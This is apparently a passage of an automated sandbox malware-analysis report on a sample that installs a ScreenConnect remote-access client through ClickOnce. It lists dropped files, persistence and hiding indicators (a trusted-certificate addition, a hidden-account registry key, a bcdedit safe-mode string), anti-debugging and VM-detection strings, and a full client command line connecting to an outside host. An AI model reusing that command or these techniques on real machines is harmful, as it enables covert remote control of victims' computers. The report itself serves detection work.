                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.ClientService.exeJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\ApplicationJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1496697785.0000000000D20000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1496898405.000000000288E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.exe, 00000005.00000002.1445573934.0000000005112000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 00000005.00000002.1444630870.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 272FD4C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 272FEED0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeMemory allocated: B20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeMemory allocated: 1A700000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeMemory allocated: 720000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeMemory allocated: E30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 526Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 1569Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2573Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..vice_4b14c015c87c1ad8_0018.0004_none_04f4a774935ed06c\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..dows_4b14c015c87c1ad8_0018.0004_none_5818e70d39ed8031\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..core_4b14c015c87c1ad8_0018.0004_none_53a10f2bfd9f6d01\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\44WRGOCZ.N86\B07C6WH9.KE3\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9b66cfe0ceec305\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exe TID: 6844Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6160Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6192Thread sleep time: -128650s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6160Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exe TID: 6232Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe TID: 7044Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe TID: 4960Thread sleep count: 200 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00764B9B FindFirstFileExA,0_2_00764B9B
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\Jump to behavior
                  Source: Amcache.hve.8.drBinary or memory string: VMware
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000002.1499314976.000000001AFD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE|+9Y
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                  Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000001.00000002.2720941226.000002729B6B7000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2724880661.00000272FF5C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: dfsvc.exe, 00000001.00000002.2720941226.000002729B6B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW"e
                  Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00761920
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00761000
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_007637C7 mov eax, dword ptr fs:[00000030h]0_2_007637C7
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_007669E3 GetProcessHeap,0_2_007669E3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00761493
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_007646C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007646C3
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.14514.3.exeCode function: 0_2_00761AAD SetUnhandledExceptionFilter,0_2_00761AAD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=variols.ephelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQBN%2fsDy6XX2LDmcpyEoKK55JwThlRr7YHNGe39snOuHFtnjCyK72cZJH78V0V1YAf3iHC4VrBqpgJlkVuiU31AA%2fvSAfza7nhZjCa5ykV2NAakmwwsZZcF4P1vkpVkI7ANPAC%2bVyPuI2q4BXqVaSlq5q6E2QfxXeftcqNGKOU7f6LwNITHSyFLXqkb6omGbacpFoHOXIhxtO51vc7VoYDnePo%2bPLojTyIgk0TnsKSl3v5MmaDGdZnaRO%2fgpfn0w%2fd8d4r7vK%2b35r8AOTYEvrTtJo%2bk50eZpwyQ3Wb4JzVjk4643SyQu2kEB3raxmEp6Lu%2bCnvj%2fq6inamW4uCChS0u0&r=&i=" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\V0DMJ93T.Z9B\4KQQ0DB9.HM7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\v0dmj93t.z9b\4kqq0db9.hm7\scre..tion_25b0fbb6ef7eb094_0018.0004_c07f10b54727c540\screenconnect.clientservice.exe" "?e=support&y=guest&h=variols.ephelp.site&p=8880&k=bgiaaackaabsu0exaagaaaeaaqbn%2fsdy6xx2ldmcpyeokk55jwthlrr7yhnge39snouhftnjcyk72czjh78v0v1yaf3ihc4vrbqpgjlkvuiu31aa%2fvsafza7nhzjca5ykv2naakmwwszzcf4p1vkpvki7anpac%2bvypui2q4bxqvaslq5q6e2qfxxeftcqngkou7f6lwnithsyflxqkb6omgbacpfohoxihxto51vc7voydnepo%2bplojtyigk0tnsksl3v5mmadgdznaro%2fgpfn0w%2fd8d4r7vk%2b35r8aotyevrttjo%2bk50ezpwyq3wb4jzvjk4643syqu2keb3raxmep6lu%2bcnvj%2fq6inamw4ucchs0u0&r=&i=" "1"
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr Binary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 00000004.00000000.1097848481.0000000000352000.00000002.00000001.01000000.00000009.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
